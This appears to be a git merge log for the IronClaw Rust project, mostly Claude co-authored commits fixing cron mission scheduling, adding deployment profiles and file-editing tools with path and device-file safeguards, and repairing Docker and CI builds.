- CodeAct scripting validates on read, falls back to "UTC" for missing
- Fix orchestrator doc comment (bridge router, not ConversationManager)
- Tighten test assertion to require strictly future next_fire_at
- Add ValidTimezone unit tests (parse, serde roundtrip, empty/invalid)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: remove clone_on_copy for ValidTimezone (clippy)

ValidTimezone is Copy, so .clone() is unnecessary. Clippy CI caught this.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: lenient timezone deserialization + bootstrap backfill (#1944)

Address second round of PR review feedback:

- Add deserialize_option_lenient() in ironclaw_common so persisted
  missions with invalid timezone strings deserialize as None instead
  of failing the whole record
- Apply lenient deserializer to MissionCadence::Cron.timezone field
- Backfill next_fire_at in bootstrap_project() for legacy cron missions
  that predate the scheduling fix (next_fire_at was None)
- Remove unused chrono-tz direct dep from ironclaw_engine (now via
  ironclaw_common)
- Add tests for lenient deserialization (valid, invalid, null, missing)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: collapse nested if in bootstrap_project (clippy)

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): address PR review — pre-spawn timezone, update_mission scheduling, polish

Addresses 6 unanswered review comments on #1957:

- (high, serrrfirat) router.rs: user_timezone was set after start_thread,
  so the executor's in-memory thread never saw it on the first turn.
  Threaded user_timezone through handle_user_message ->
  spawn_thread_with_history via a new initial_metadata param so it lands
  on the thread before the background task starts. source_channel is
  routed through the same path (had the same latent bug).

- (high, serrrfirat / Copilot) update_mission: Manual -> Cron left
  next_fire_at = None and the mission stayed inert; cron expression
  edits kept firing on the old schedule. update_mission now recomputes
  next_fire_at for Cron and clears it for non-cron cadences.

- (low, Copilot) parse_cadence: dropped trimmed.contains(' ') so cron
  expressions with tab/newline separators are detected.

- (medium, Copilot) bootstrap_project: backfill save_mission failure now
  logs at debug! instead of being silently swallowed.

- (low, Copilot) codeact_preamble: cron timezone is a default, not
  automatic — explicit timezone param overrides.

Plus self-review polish:
- normalize_cron_expression rejects 4-field (and other off-count) input
  up front with a clear error instead of falling through to the cron
  parser.
- fire_mission has a comment explaining the catch-up semantics
  (next_fire_at recomputed from now(), missed windows coalesced).
- New unit tests for next_cron_fire with an explicit America/New_York
  timezone, plus 3 update_mission regression tests for Manual->Cron,
  Cron->Manual, and cron expression change.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): DST/timezone tests, InvalidCadence error, lenient drop log

Addresses the latest review on #1957:

- Add EngineError::InvalidCadence and switch next_cron_fire to use it.
  Cron parse failures are validation errors, not store errors — callers
  can now map them to user-facing messages without misclassification.

- Add DST regression tests in types/mission.rs covering the two tricky
  cases the PR exists to enable:
    * spring-forward gap (30 2 * * * on a missing-local-hour day must
      not land in the [02:00, 03:00) window)
    * fall-back overlap (30 1 * * * on a doubled-hour day must
      consistently round-trip)
    * 30-day window straddling spring-forward must contain both
      13:00 and 14:00 UTC fires for an "9am NY" schedule
  Plus normalize_seven_field_cron and an InvalidCadence error path test.

- Add a tz-positive test in runtime/mission.rs that creates a cron
  mission with America/New_York and asserts the resulting next_fire_at
  lands at UTC 13/14 (NY 09:00) rather than UTC 09 — exercising the
  full MissionManager → next_cron_fire chain end-to-end.

- ironclaw_common::deserialize_option_lenient now logs at debug! when
  it drops an invalid IANA timezone string to None, so a typo in fresh
  user config is observable in logs even though the record loads.
  Adds tracing as a direct dep of ironclaw_common.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): suppress no-panics check on DST test helper

The check_no_panics.py CI script has a pre-existing lexer bug where a
lifetime apostrophe in this file (`Formatter<'_>` on line 38) puts its
char-state lexer into character mode permanently, breaking brace
tracking and so failing to detect that the new `schedule_after` test
helper lives inside `#[cfg(test)] mod tests`. The script normally only
checks added lines so the latent bug is invisible — my new helper
exposed it.

Use the script's documented `// safety:` per-line escape hatch to
suppress the false positives. The helper is unambiguously a test-only
helper and the panics are intentional in test context.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): log all next_cron_fire failure modes in bootstrap backfill

PR review (Copilot): bootstrap_project only patched the legacy mission
when next_cron_fire returned Ok(Some(next)). The Ok(None) case (cron
expression with no upcoming fire times — e.g. a year-restricted
expression in the past) and the Err(_) case (invalid expression) both
fell through silently, leaving the mission Active with next_fire_at =
None and no log signal — exactly the silent-stuck-mission scenario
this PR is supposed to prevent.

Match all three branches and emit a debug! log on each path so an
operator can see which legacy missions need attention.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): close resume_mission TOCTOU window and stop fire_mission from orphaning threads

Two medium-severity issues from PR review (serrrfirat):

1. **resume_mission TOCTOU.** The previous flow was
   `update_mission_status(Active)` followed by a separate `load + mutate
   next_fire_at + save` round-trip — leaving an extra interleave window
   where a concurrent `update_mission`/`fire_mission` write could be
   silently clobbered by the second save's stale reload. Use the mission
   already loaded for the ownership check, set `status = Active` and
   `next_fire_at`, and do a single `save_mission`.

2. **fire_mission orphan thread.** The thread was spawned, then
   `next_cron_fire(...)?` and `save_mission(...)?` ran. Both could
   propagate Err *after* the thread was already running, leaving:
   - no entry in `thread_history`
   - `threads_today` not incremented (budget bypassed)
   - no outcome watcher installed

   Two narrow fixes:
   - Install `spawn_mission_outcome_watcher` *before* `save_mission`.
     The watcher only depends on `thread_id` (it joins via
     ThreadManager and reloads the mission record itself), so a
     transient store error no longer abandons the running thread.
   - Replace `next_cron_fire(...)?` with match-and-log: a parse error
     on a corrupt persisted expression now preserves the existing
     `next_fire_at` and emits a `debug!` instead of aborting fire and
     unwinding past the spawn.

Regression tests:
- `fire_mission_with_corrupt_cron_expression_does_not_orphan_thread`
- `resume_mission_preserves_concurrent_field_changes`

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): Paranoid Architect review — orphan/re-fire, TOCTOU, cron docs, resume tz

Addresses 4 of 5 findings from serrrfirat's Paranoid Architect review on
#1957 (the 5th is declined with rationale in the PR thread).

1. (HIGH) fire_mission save_mission failure non-fatal + tick() per-mission
   isolation. The previous code propagated `save_mission(...)?` after the
   thread was spawned, leaving an orphan thread *and* — for cron cadences —
   leaving next_fire_at un-advanced, causing the next tick to re-fire the
   same mission in a runaway loop. Now save is best-effort: log a `debug!`
   on failure and still return Ok(Some(thread_id)). The watcher is already
   installed (from the earlier round). Separately, tick() now catches
   per-mission load and fire failures with match-and-continue so a single
   bad mission doesn't abort the entire tick cycle.

2. (MED) bootstrap_project backfill TOCTOU: previously list_all_missions
   then a deferred save_mission could clobber concurrent writes with the
   stale snapshot. Now re-load the mission immediately before save and
   only patch if next_fire_at is still None — narrows the window
   significantly without adding a new Store trait method. Residual race
   documented inline.

3. (MED) 6-field cron ambiguity: the `0 9 * * * 2027` form could be read
   as either "sec min hr dom mon dow" (our normalizer's interpretation,
   matching the `cron` crate's native format) or Quartz-style "min hr dom
   mon dow year". Documented the assumed format in the doc comment, added
   a regression test pinning the interpretation, and noted it in the
   CodeAct preamble so users know to use the explicit 7-field form for
   year-bounded schedules.

4. (MED) user_timezone propagation on inject/resume: only set on new
   thread spawn before. Now the resume path writes the fresh tz to
   thread metadata before resume_thread() reloads from store, so the
   resumed execution sees the up-to-date value. The inject path is
   documented as a known limitation — updating live in-memory state in
   a running ExecutionLoop requires a new signal type (out of scope).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): close latent next_fire_at bypass in ensure_* mission helpers

PR review (serrrfirat): two private mission-creation helpers built a
Mission via `Mission::new() + save_mission()` directly, skipping the
`next_fire_at` computation that `create_mission` performs. Today every
caller passes `OnSystemEvent` so the bug never bites — but a future
caller passing `Cron` would silently re-introduce the original
`next_fire_at = None` bug that #1944 fixes, and the bootstrap backfill
wouldn't help (it only triggers for Active+Cron with `next_fire_at =
None` *after* a process restart).

Add the same Cron-cadence guard to both helpers:
- `ensure_self_improvement_mission`
- `ensure_mission_by_metadata`

Regression test `ensure_mission_by_metadata_with_cron_cadence_computes_next_fire_at`
exercises the cron path through the private helper and asserts the
computed `next_fire_at` is set and in the future.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): final PR #1957 review pass — Ok(None) cron + tick cooldown

Addresses the remaining open review threads on PR #1957:

1. types/mission.rs:391 — DST test reference comment now matches the
   actual `2027-03-13 00:00 UTC` anchor instead of the stale `22:00 UTC`
   wording (Copilot 3050772614 / 3055762609).

2. runtime/manager.rs::set_thread_metadata — was best-effort and silently
   swallowed store errors, while the conversation.rs:250 caller comment
   claimed the resumed thread was guaranteed to see the new value. Now
   returns Result<(), EngineError>; conversation.rs logs on failure and
   the comment is honest about the contract (Copilot 3051471863 +
   serrrfirat 3056444137).

3. types/mission.rs::next_cron_fire_required — new helper that maps
   Ok(None) to EngineError::InvalidCadence. Used by create_mission,
   update_mission cadence-change, resume_mission, and the two
   ensure_*_mission helpers. fire_mission and bootstrap_project keep
   the existing grace (logged) since the thread/data is already in
   flight (Copilot 3051471912/47/85 + serrrfirat 3056443657).

4. runtime/mission.rs::tick — when save_mission fails after a successful
   spawn, the persisted next_fire_at stays in the past and every
   subsequent 60s tick re-fires the same mission, spawning duplicates
   up to the daily budget. Added an in-memory `last_fire_attempt` map
   armed by fire_mission (regardless of save outcome) and consulted by
   tick to enforce a 90s per-mission cooldown (serrrfirat 3056443083).

Regression tests:
 - create_mission_rejects_unschedulable_cron
 - update_mission_rejects_switch_to_unschedulable_cron
 - resume_mission_rejects_unschedulable_cron
 - tick_cooldown_suppresses_re_fire_on_save_failure

All four use a 7-field year-locked cron (`0 0 0 1 1 * 2020`) to exercise
the Ok(None) path deterministically. Mission test count: 49 → 53.

Verified: cargo fmt clean, cargo clippy --all-targets --all-features
zero warnings, full `cargo test` green.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): prune fire cooldown map + reject Quartz-style 6-field cron

Addresses two follow-up review threads on PR #1957:

1. `last_fire_attempt` was insert-only — completed/paused missions left
   stale entries that accumulated over the process lifetime. Now:
   - `pause_mission` and `complete_mission` drop the entry explicitly.
   - `tick` opportunistically prunes any entry whose cooldown window has
     elapsed, catching stragglers from non-graceful transitions (crash
     recovery, direct store edits) so the map can never grow unbounded.
   Regression test: `pause_and_complete_drop_cooldown_entry`.
   (serrrfirat 3057568698)

2. 6-field cron with a year-shaped trailing field (e.g. `0 9 * * * 2027`)
   was silently misinterpreted as `sec min hr dom mon dow=2027` instead
   of the Quartz-style "9am daily in 2027" the caller almost certainly
   meant. `normalize_cron_expression` now rejects this pattern with a
   clear `InvalidCadence` error pointing at the explicit 7-field form
   (`0 0 9 * * * 2027`). The 4-digit year heuristic is bounded to
   1970-2099 so out-of-range numerics fall through unchanged. The
   existing pinning test for `* `-terminated 6-field input is unaffected.
   Regression test: `six_field_cron_with_year_shaped_last_field_is_rejected`.
   (serrrfirat 3057569413)

Verified: cargo fmt clean, cargo clippy --all-targets --all-features
zero warnings, full `cargo test` green (308 engine tests pass).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(bridge,engine): parse_cadence prefix ordering + year-stable cron tests

Addresses three Copilot review threads on PR #1957:

1. `parse_cadence` (src/bridge/effect_adapter.rs) checked the cron
   heuristic (`split_whitespace().count() >= 5`) BEFORE the explicit
   `event:` / `webhook:` prefixes. An input like `event: a b c d e`
   silently became a `Cron` cadence with a parse-error downstream rather
   than the `OnEvent` the user requested. Reordered to check explicit
   prefixes first, falling through to cron only when none match.
   Regression test `parse_cadence_event_prefix_with_multi_token_pattern`
   covers `event:` + `webhook:` + a real cron control case.
   (Copilot 3057828107)

2. `next_cron_fire_respects_timezone` asserted `in_ny.year() >= 2026`,
   which is time-dependent (fails before 2026, tautology after). Replaced
   with `assert!(in_ny > Utc::now())` so the test stays stable across
   calendar years. (Copilot 3057828177)

3. `update_mission_cron_expression_change_recomputes_next_fire_at` used
   `0 0 1 1 *` ("once a year on Jan 1") as `before` and asserted
   `after < before`. Race around New Year's: the yearly schedule's next
   fire could land within seconds and invert the ordering. Switched to a
   year-locked 7-field cron (`0 0 0 1 1 * 2099`) so the next fire is
   deterministically far in the future regardless of run date.
   (Copilot 3057828212)

Verified: cargo fmt clean, cargo clippy --all-targets --all-features
zero warnings, full `cargo test --lib` green.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): outcome processor reconciles fire accounting on save failure

Addresses Copilot review thread on PR #1957:

When `fire_mission`'s post-spawn `save_mission` fails, the persisted
mission is left missing the new `thread_id` (in `thread_history`), the
`threads_today` increment, the `last_fire_at` stamp, and — for cron
cadences — the advanced `next_fire_at`. The in-memory `last_fire_attempt`
cooldown holds the runaway re-fire path closed for ~90 s, but once it
elapses tick would re-fire against the still-stale persisted state.
Worse, when the spawned thread later completes, the outcome watcher
loaded the **stale** mission, mutated only `approach_history`/`status`,
and saved — permanently overwriting any chance to record the missing
fields.

`process_mission_outcome_and_notify` now reconciles those fields the
first time it sees a `thread_id` that isn't in `thread_history`:

  - Append `thread_id` to `thread_history`
  - Bump `threads_today` (saturating)
  - Stamp `last_fire_at = now` as a conservative approximation
  - For cron missions, recompute `next_fire_at` if it's None-or-past

The reconcile is idempotent: a replay with the same `thread_id` is a
no-op. Achieves eventual consistency for transient store failures even
after retries are exhausted, and handles the permanent-failure case
that a save-side retry loop alone could not.

Regression test: `outcome_processor_reconciles_missing_fire_accounting`
covers both the first-time reconcile path (history append, budget bump,
last_fire_at stamp, cron next_fire_at advance) and idempotent replay
(no double-count, no duplicate history entry).

Verified: cargo fmt clean, cargo clippy --all-targets --all-features
zero warnings, full `cargo test --lib` green, ironclaw_engine 87/87
mission tests pass.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): cooldown only on save failure + reconcile to original fire instant

Self-review pass on the #1944 work — addresses three findings from a fresh
read of the cooldown / reconcile interaction:

1. **Tick cooldown was throttling high-frequency cron schedules.** The
   in-memory `last_fire_attempt` map was checked unconditionally, with
   the 90 s cooldown enforced even for normally-firing cron missions.
   For `* * * * *` (every minute) the 60 s tick interval falls inside
   the 90 s window, so half the events were silently dropped after every
   successful fire. The cooldown was only ever needed to detect a
   `save_mission` failure, not to enforce a global rate floor.

   Fix: `fire_mission` now uses a single `fire_instant` for both the
   persisted `Mission.last_fire_at` and the in-memory cooldown entry.
   Tick arms the cooldown only when the persisted `last_fire_at`
   does NOT equal the in-memory value — the equality is the proof
   that `save_mission` succeeded. On the success path the two match
   and the cooldown is transparent regardless of cron frequency. On
   the failure path the persisted side still holds the OLD value
   (or `None`), the mismatch fires, and re-fire is suppressed until
   reconcile.

   Regression test:
   `tick_does_not_throttle_high_frequency_cron_after_successful_fire`
   creates a `* * * * *` mission, fires it, advances `next_fire_at`
   into the past WITHOUT clobbering `last_fire_at`, calls tick, and
   asserts a new thread is spawned. The pre-existing failure-mode
   test was updated to explicitly clobber `last_fire_at` so it
   continues to model the failed-save state under the new logic.

2. **Reconcile drifted `last_fire_at` to the outcome time.** When
   `process_mission_outcome_and_notify` reconciled fields after a
   failed save, it stamped `last_fire_at = now`, which can be many
   seconds (or hours, for long-running mission threads) later than the
   actual fire instant. For users with a configured `cooldown_secs`,
   that drift gradually extended the cooldown window beyond what the
   user asked for.

   Fix: thread the original `fire_instant` from `fire_mission` through
   `spawn_mission_outcome_watcher` and `process_mission_outcome_and_notify`
   as `original_fire_at: Option<DateTime<Utc>>`. The reconcile path
   uses it to set `last_fire_at` back to the moment of the original
   spawn, falling back to `now` only when the watcher path is unknown
   (test helpers, callers without an original instant). The watcher's
   `original_fire_at` ALSO matches the in-memory `last_fire_attempt[mid]`
   value, so the cooldown's mismatch detector resolves immediately
   after reconcile — even before the 90 s window elapses.

   Regression test: `outcome_processor_reconciles_missing_fire_accounting`
   now passes an explicit `original_fire_at` and asserts the
   reconciled `last_fire_at` equals that exact instant (not `now`).

3. **Reconcile bypassed `mission.record_thread`.** It pushed directly
   into `thread_history` and missed the `updated_at` bump.
   `process_mission_outcome_and_notify` re-stamps `updated_at` later
   so there was no functional impact, but two paths diverging on the
   same field-mutation pattern is a future-bug invitation.

   Fix: use `mission.record_thread(thread_id)` in the reconcile branch
   for parity with `fire_mission`.

Polish:
 - Documented the lenient `next_cron_fire` choice at all three call
   sites (`bootstrap_project` backfill, `fire_mission` post-spawn
   advance, reconcile path) to make the lenient/strict split easy to
   spot during review.
 - Added a clarifying comment on `update_mission`'s save-after-validate
   sequencing — `save_mission` is the only persistence boundary in the
   function, so `next_cron_fire_required`'s `Err` leaves the store
   untouched even though the in-memory `mission` was already mutated.

Verified: cargo fmt clean, cargo clippy --all-targets --all-features
zero warnings, full `cargo test --lib` green, ironclaw_engine 88/88
mission tests pass (87 → 88).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(engine): close cooldown race + corrupt-cron runaway

Self-review pass on the cooldown rework — addresses the two failure
modes a fresh read of the success/failure detection turned up plus a
documentation gap on the equality check.

1. **TOCTOU race between save_mission success and cooldown insert.**
   The previous order was `save_mission(...)` → `last_fire_attempt.insert(...)`.
   A concurrent tick observing the gap saw the freshly-persisted
   `last_fire_at = fire_instant` AND no in-memory entry, evaluated the
   mismatch check to false, and (if `next_fire_at` was still in the past
   from any other code path) re-fired immediately.

   Fix: insert into `last_fire_attempt` BEFORE calling `save_mission`.
   While save is in flight, the in-memory map has `fire_instant` and
   the persisted record still has the OLD `last_fire_at`, so a concurrent
   tick sees a mismatch and arms the cooldown. Once save lands the
   values match (success) or stay mismatched (failure) — both correct.

   Regression test: `fire_mission_arms_cooldown_before_save_mission`.
   Adds an optional save-mission gate to `TestStore` (via oneshot
   channel + Notify), spawns `fire_mission` in a task, waits for save
   to enter the gate, and asserts `last_fire_attempt[mid]` is already
   populated while save is parked.

2. **Corrupted cron expression bypassed the cooldown.** When
   `next_cron_fire(expression)` returned `Err` (corrupt persisted
   expression), the previous code stamped `last_fire_at = fire_instant`
   anyway. Save then succeeded with `last_fire_at` matching the
   in-memory value, so tick's mismatch detector saw "save succeeded"
   and the cooldown was never armed. With `next_fire_at` still in the
   past (preserved because the cron crate couldn't compute a new one),
   every tick re-fired the same mission until `max_threads_per_day`
   was exhausted — same root cause shape as #1944.

   Fix: track `cron_advanced: bool` in `fire_mission`. When the cron
   advance fails, deliberately leave `last_fire_at` at its OLD value.
   The in-memory `last_fire_attempt[mid]` is still set to `fire_instant`,
   so the in-memory vs persisted mismatch arms the cooldown via the
   exact same code path as a save failure — no new signal needed.
   After 90 s the cooldown elapses and tick can retry, bounded by
   `max_threads_per_day`, in case the corruption resolves.

   Regression test: `tick_does_not_re_fire_corrupted_cron_within_cooldown_window`.
   Creates a cron mission, corrupts the persisted expression, sets
   `next_fire_at` to the past, fires once, then asserts a subsequent
   tick returns no new spawn AND that the persisted `last_fire_at`
   was deliberately left unset (proving the mismatch-arming path).

3. **Documented the equality check's precision requirement.** The
   `mission.last_fire_at != Some(*in_mem_last)` comparison is
   load-bearing and assumes the `Store` round-trips `DateTime<Utc>`
   without precision loss. The bridge's in-memory cache and JSON
   persistence both preserve nanoseconds; a future Postgres-backed
   store using `TIMESTAMPTZ` would silently break the success-path
   detection (microsecond truncation). Added a long comment at the
   tick check pointing future store implementers at the requirement
   so the next backend addition can either preserve precision or
   relax the comparison to "within one microsecond" before landing.

Verified: cargo fmt clean, cargo clippy --all-targets --all-features
zero warnings, full `cargo test --lib` green, ironclaw_engine 90/90
mission tests pass (88 → 90).

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* feat: add extensible deployment profiles (IRONCLAW_PROFILE)

Add a profile system that lets users select a deployment shape with a
single env var. Profiles are partial Settings TOML files merged onto
defaults before config.toml and DB overlays.

Built-in profiles: local, local-sandbox, server, server-multitenant.
Users can create custom profiles in ~/.ironclaw/profiles/.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix: address review comments — path traversal, case normalization, override order, formatting

- Sanitize IRONCLAW_PROFILE to reject path traversal attempts (/, \, ..)
- Normalize profile name to lowercase for both user-path and built-in lookups
- Fix load_bootstrap_settings to use Settings::default() matching from_env() pattern
- Collapse .unwrap_or_default() onto one line to satisfy rustfmt
- Improve user_profile_overrides_builtin test to exercise actual merge logic
- Add path_traversal_rejected test with 5 malicious name patterns

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…2025)

* feat(tools): add production-grade coding tools, file history, and coding skills

Add dedicated coding tools inspired by Claude Code's architecture to make
IronClaw a more effective coding assistant:

New tools:
- GlobTool: fast file pattern matching via `glob` crate, sorted by mtime,
  with default exclusions (.git, node_modules, target, etc.)
- GrepTool: content search wrapping ripgrep with 3 output modes
  (content, files_with_matches, count), pagination, and context lines
- FileUndoTool: restore files to pre-modification state using in-memory
  file history snapshots

Enhanced tools:
- ReadFileTool: 10MB limit, 2000-line default, binary detection, device
  path blocking (/dev/zero, /proc/*/fd/*)
- ApplyPatchTool: uniqueness validation (error on ambiguous matches),
  workspace path rejection, 10MB size limit, file history integration
- WriteFileTool: file history integration for undo support

Updated tool descriptions to guide LLM behavior (prefer apply_patch over
write_file, always read before editing, use glob/grep instead of shell).

New skills:
- coding: best practices for code editing, search, and file operations
- commit: git commit message generation workflow
- review: code review workflow with structured checklist

Shared infrastructure:
- DEFAULT_EXCLUDED_DIRS constant in path_utils.rs
- FileHistory module with SharedFileHistory for cross-tool snapshots

66 new tests covering all tools, edge cases, and regression scenarios.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* style: apply cargo fmt formatting

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(tools): address PR review — security, correctness, and robustness fixes

- Move device path blocking after validate_path() to prevent traversal bypass
- Add /proc/kcore, /proc/kmem to blocked paths
- Reject absolute patterns and '..' in glob tool, add strip_prefix defense
- Wrap glob sync I/O in spawn_blocking to avoid blocking tokio executor
- Sort files_with_matches globally before pagination in grep tool
- Add default exclusions for node_modules/target in grep tool
- Inject ctx.extra_env into rg environment matching ShellTool policy
- Use per-line strip_prefix for content mode path relativization
- Change FileSnapshot.content_before to Vec<u8> for binary file support
- Log snapshot errors with tracing::debug instead of silently discarding
- Fix skill name mismatch: code-review → review to match directory

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* refactor(skills): rename review skill directory to code-review

Aligns the directory name with the manifest name (code-review) to prevent
incorrect override/dedup behavior in the bundled-skill loader. The name
stays "code-review" since other domains may also need review-type skills.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* feat(tools): add file edit guards — staleness detection, fuzzy matching, encoding preservation

Add file_edit_guard module with production-grade safeguards for file editing:
- ReadFileState tracks file reads with mtime for staleness detection
- 4-level fuzzy matching fallback (exact → whitespace-normalized → quote-normalized → both)
- UTF-16LE BOM detection and line ending style preservation (LF/CRLF/CR)
- Read-before-edit enforcement for ApplyPatch and WriteFile tools
- No-op edit rejection (old_string == new_string)
- Shared state injection via Arc<RwLock<>> across ReadFile, WriteFile, ApplyPatch

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(tools): address all PR review comments — session scoping, parallelism, security

- Session-scoped state: ReadFileState and FileHistory now keyed by job_id
  so concurrent sessions sharing the same registry don't leak state (#2025)
- Parallel metadata: grep files_with_matches uses JoinSet (max 64 concurrency)
  instead of sequential await per file for mtime sorting
- Shared env allowlist: grep_tool imports SAFE_ENV_VARS from shell.rs
  (made pub(crate)) instead of maintaining a divergent copy
- Glob traversal: uses Component::ParentDir check instead of substring ".."
  match, so patterns like "foo..bar" are no longer falsely rejected
- UTF-16LE in read_file: binary detection skips null-byte check for files
  with UTF-16LE BOM; read_file uses encoding-aware read path
- Partial flag: default 2000-line truncation now marks read as partial,
  preventing edits against unseen content
- write_file guard softened: staleness check logs warning instead of
  hard error (full-file replacement has lower risk than apply_patch)
- Updated e2e trace to include read_file before apply_patch
- Updated expected tool list in schema validation tests

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(tools): use async metadata instead of blocking path.exists() in write_file

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(ci): fix false-positive panic detection for lifetimes in char lexer

The check_no_panics.py lexer misinterpreted Rust lifetimes ('static) as
char literal starts, causing in_char state to persist across lines and
hide all subsequent brace-delimited blocks — including #[cfg(test)] mod
tests. Reset in_char at line boundaries since Rust char literals cannot
span lines.

https://claude.ai/code/session_012bJjER6L5zSAFd9BqYMUmC

* test: verify MCP push works

* test

* chore: remove test file

* style: apply cargo fmt to file.rs

Collapse multi-line method chain to single line per rustfmt.

https://claude.ai/code/session_012bJjER6L5zSAFd9BqYMUmC

* style: apply cargo fmt to file.rs

Collapse multi-line method chain to single line per rustfmt.

https://claude.ai/code/session_012bJjER6L5zSAFd9BqYMUmC

* fix(file-tools): harden fuzzy patch matching and undo

* fix(ci): formatting + wasmtime 43 cache config compatibility

After merging latest staging, cargo fmt had diffs in file tools and the
wasmtime cache TOML format changed (v43 dropped the `enabled` field
under `[cache]`). Also removes accidental .fmt-test artifact.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* refactor(file-tools): simplify strip_trailing_whitespace

Remove redundant double-pass through .lines() — the first
collect+join was a no-op since .lines() already handles line endings.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(tools): address PR review comments — security, correctness, tests

- Add is_sensitive_path checks to GlobTool and GrepTool, matching the
  defense-in-depth posture of ReadFileTool/WriteFileTool/ListDirTool
- Fix UTF-8 panicking byte-index slice in apply_patch error preview
  (old_string[..200] → chars().take(200))
- Add 10MB size guard on file_history snapshots to prevent memory
  exhaustion from snapshotting large files
- Replace dead turn_number field with auto-incrementing sequence_number
  in FileHistory — callers no longer pass a hardcoded 0
- Fix glob mtime test flakiness by increasing sleep to 1100ms (above
  1s filesystem granularity)
- Fix emoji test to actually include emoji/non-ASCII content

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Co-authored-by: Zaki Manian <zaki@iqlusion.io>
* fix(docker): copy profiles/ directory into build stages

The deployment profiles feature (152e8b0) added include_str!() references
to profiles/*.toml but never updated the Dockerfile, breaking Docker builds.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(docker): remove profiles/ from planner stage

cargo chef prepare only scans manifests, not compile-time macros.
Having profiles/ in the planner stage needlessly invalidates the
dependency cache when a profile TOML changes.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
* fix(ci): resolve 4 staging test failures (#2224, #2178)

1. **wasmtime cache config**: Remove `enabled = true` from generated
   TOML — wasmtime 43.x dropped this field, causing both
   `test_enable_compilation_cache_*` tests to panic with
   "unknown field `enabled`".

2. **bare approval keyword routing**: The `pending_approval.is_none()`
   guard at thread resolution rejected `ApprovalResponse` submissions
   (bare "yes"/"no") before reaching the `should_route_as_approval`
   downgrade added in e0e0fcd. Narrow the early rejection to
   `ExecApproval` only so bare keywords fall through to `UserInput`
   processing when no approval is pending.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(test): tighten WASM cache TOML assertion to check key-value format

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(agent): gate approval auth check on pending_approval.is_some()

Bare keywords falling through as UserInput should not be blocked by the
cross-channel authorization guard. Threads with source_channel=None
(e.g. hydrated legacy threads) fail closed in is_approval_authorized,
which would reject bare "yes"/"no" even though they are about to be
downgraded to regular user input.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* fix(agent): update stale security comment and add guard regression test

Address review feedback from @serrrfirat:
1. Update the comment at the approval guard to reflect that only
   ExecApproval is early-rejected (ApprovalResponse falls through).
2. Add unit test verifying the guard narrowing: ApprovalResponse +
   no pending approval passes, ExecApproval is rejected, and
   ExecApproval with pending approval also passes.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

* style: cargo fmt

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
…1568

chore: promote staging to staging-promote/f37a26f7-24252590260 (2026-04-10 17:16 UTC)
…0260

chore: promote staging to staging-promote/56eb0adf-24250005637 (2026-04-10 16:16 UTC)
…5637

chore: promote staging to staging-promote/a8e6533a-24247643750 (2026-04-10 15:15 UTC)
…3750

chore: promote staging to staging-promote/e5b82fc6-24240316990 (2026-04-10 14:22 UTC)
…6990

chore: promote staging to staging-promote/55cdbf2b-24238274684 (2026-04-10 11:17 UTC)
…4684

chore: promote staging to staging-promote/4147c6d5-24236159086 (2026-04-10 10:20 UTC)
…9086

chore: promote staging to staging-promote/efdb738a-24229913248 (2026-04-10 09:25 UTC)
…3248

chore: promote staging to staging-promote/b9b239ee-24221882216 (2026-04-10 06:33 UTC)
…2216

chore: promote staging to staging-promote/26e5e4cf-24213659418 (2026-04-10 01:33 UTC)
…9418

chore: promote staging to staging-promote/e0bdd74f-24206212580 (2026-04-09 21:14 UTC)
@henrypark133
